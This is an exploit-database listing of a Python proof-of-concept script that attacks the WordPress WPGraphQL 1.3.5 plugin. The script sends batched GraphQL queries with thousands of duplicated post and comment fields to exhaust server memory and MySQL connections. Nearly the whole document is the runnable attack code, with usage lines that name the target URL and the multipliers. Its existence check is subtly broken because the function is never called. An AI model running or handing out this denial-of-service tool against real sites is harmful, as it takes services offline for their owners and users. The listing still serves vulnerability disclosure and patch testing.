Exploit for WordPress WPGraphQL 1.3.5 Denial Of Service

## https://sploitus.com/exploit?id=PACKETSTORM:162347
# Exploit Title: WordPress Plugin WPGraphQL 1.3.5 - Denial of Service   
# Author: Dolev Farhi  
# Date: 2021-04-12  
# Vendor Homepage: https://www.wpgraphql.com/  
# Version: 1.3.5   
# Tested on: Ubuntu  
  
  
"""  
This attack uses duplication of fields amplified by GraphQL batched queries, resulting in server OOM and MySQL connection errors.  
"""  
  
import sys  
import requests  
  
  
def usage():  
print('* WordPress GraphQL 1.3.5 Denial of Service *')  
print('python {} <wordpress_url> <number_of_field_duplications> <number_of_chained_queries>'.format(sys.argv[0]))  
print('python {} http://site.com 10000 100'.format(sys.argv[0]))  
sys.exit(1)  
  
if len(sys.argv) < 4:  
print('Missing arguments!')  
usage()  
  
def wpgql_exists():  
try:  
r = requests.post(WORDPRESS_URL, json='x')  
if 'GraphQL' in r.json()['errors'][0]['message']:  
return True  
except:  
pass  
return False  
  
# This PoC assumes graphql is located at index.php?graphql  
WORDPRESS_URL = sys.argv[1] + '/index.php?graphql'  
FORCE_MULTIPLIER = int(sys.argv[2])  
CHAINED_REQUESTS = int(sys.argv[3])  
  
if wpgql_exists is False:  
print('Could not identify GraphQL running at "/index.php?graphql"')  
sys.exit(1)  
  
queries = []  
  
payload = 'content \n comments { \n nodes { \n content } }' * FORCE_MULTIPLIER  
query = {'query':'query { \n posts { \n nodes { \n ' + payload + '} } }'}  
  
for _ in range(0, CHAINED_REQUESTS):  
queries.append(query)  
  
r = requests.post(WORDPRESS_URL, json=queries)  
print('Time took: {} seconds '.format(r.elapsed.total_seconds()))  
print('Response:', r.json())